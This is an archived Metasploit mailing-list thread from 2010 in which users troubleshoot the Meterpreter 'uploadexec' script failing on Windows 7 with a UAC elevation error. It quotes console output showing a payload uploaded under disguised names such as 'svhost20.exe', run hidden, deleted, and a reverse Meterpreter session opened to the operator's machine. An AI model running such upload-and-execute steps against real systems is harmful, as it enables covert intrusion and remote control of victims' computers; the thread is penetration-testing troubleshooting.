Metasploit mailing list archives

Re: uploadexec error


From: Miguel Rios <miguelrios35 () yahoo com>
Date: Thu, 18 Nov 2010 08:06:40 -0800 (PST)

Ah, I see. Strange. I recall seeing the UAC popup before.
Oh well, is it possible to have it not run hidden and prompt for UAC?

--- On Thu, 11/18/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

From: Carlos Perez <carlos_perez () darkoperator com>
Subject: Re: [framework] uploadexec error
To: "Miguel Rios" <miguelrios35 () yahoo com>
Cc: "Jonathan Cran" <jcran () 0x0e org>, framework () spool metasploit com
Date: Thursday, November 18, 2010, 2:46 PM

the process is ran as hidden so you will not see a UAC screen popup 
On Nov 18, 2010, at 10:42 AM, Miguel Rios wrote:
hmm, yeah I imagine this has something to do with UAC. Although i find it strange it doesn't prompt to run the binary 
like it did in the past. I'm going to try with a simple calc.exe later and will report back.

thanks

--- On Thu, 11/18/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

From: Carlos Perez <carlos_perez () darkoperator com>
Subject: Re: [framework] uploadexec error
To: "Jonathan Cran" <jcran () 0x0e org>
Cc: framework () spool metasploit com
Date: Thursday, November 18, 2010, 2:34 PM

so far it is working for me without a problem on simple executables meterpreter > run uploadexec -e ./meter.exe -r[*] 
Running Upload and Execute
 Meterpreter script....[*]      Uploading ./meter.exe....[*]    ./meter.exe uploaded![*]        Uploaded as 
C:\Users\Carlos\AppData\Local\Temp\svhost20.exe[*]  running command C:\Users\Carlos\AppData\Local\Temp\svhost20.exe[*]  
    Deleting C:\Users\Carlos\AppData\Local\Temp\svhost20.exe
[*] Sending stage (749056 bytes) to 192.168.1.242[*] Finished!meterpreter > [*] Meterpreter session 2 opened 
(192.168.1.100:4444 -> 192.168.1.242:55054) at 2010-11-18 10:33:51
 -0400
On Nov 18, 2010, at 9:39 AM, Jonathan Cran wrote:


    On 11/18/2010 07:24 AM, Miguel Rios wrote:
    
      
        
          
            
              
                
                  
                    
                      Hi,

                        Was something broken with recent updates? My
                        uploadexec was running fine until today.

                        Now when I try to run it it uploads the file to
                        the target (win 7) but there's an execution
                        error.

                        I did change the default name from svhost
                        whatever but it should work.

                        Here's my output. Any ideas what I broke Carlos?

                        

                        Running Upload and Execute Meterpreter
                        script....

                        [*]     Uploading /etc/meta/xxx.exe....

                        [*]     /etc/meta/xxx.exe uploaded!

                        [*]     Uploaded as
                        C:\Users\xxx\AppData\Local\Temp\Low\sys_update.exe

                        [*]     running command
                        C:\Users\xxx\AppData\Local\Temp\Low\sys_update.exe

                        [*] Error Running Command
                        C:\Users\xxx\AppData\Local\Temp\Low\sys_update.exe:
                        Rex::Post::Meterpreter::RequestError
                        stdapi_sys_process_execute: Operation failed:
                        740

                        [-] Error: Rex::Post::Meterpreter::RequestError
                        stdapi_sys_process_execute: Operation failed:
                        740

                        [-] Error in script: uploadexec -e
                        /etc/meta/xxx.exe

                      
                    
                  
                
              
            
          
        
      
      

    
    

    740 is a windows error specifying UAC requires elevation. Maybe UAC
    was recently enabled?

    

    jcran

    

    -- 
Jonathan Cran
jcran () 0x0e org
515.890.0070

  

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


-----Inline Attachment Follows-----

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



      



      
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: